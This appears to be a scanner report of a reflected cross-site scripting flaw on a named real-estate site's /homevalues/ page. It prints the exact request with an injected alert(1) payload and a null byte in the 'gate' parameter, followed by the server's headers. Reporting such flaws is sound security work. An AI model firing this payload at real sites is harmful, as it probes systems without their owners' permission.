1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.realtor.com |
Path: | /homevalues/ |
GET /homevalues/?gate=MSN%00c3872"%3balert(1)/ Host: www.realtor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 03 Jun 2011 01:41:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR' Set-Cookie: ASP.NET_SessionId Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Thu, 02-Jun-2011 01:41:07 GMT; path=/ Set-Cookie: recAlertSearch=recAl Set-Cookie: RecentSearch=loc%3dDALLAS Set-Cookie: SRP_ShownWinks=0; path=/ Set-Cookie: criteria=gate=MSN%00c3872 Set-Cookie: wnk-srp-p=next=12951 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 149939 <!DOCTYPE html> <!--[if gte IE 8]><html xmlns="http://www.w3.org <!--[if IE 7]><html xmlns="http://www.w3.org ...[SNIP]... ()*10); var dartbasetag="RDC/FAH.SRP ...[SNIP]... |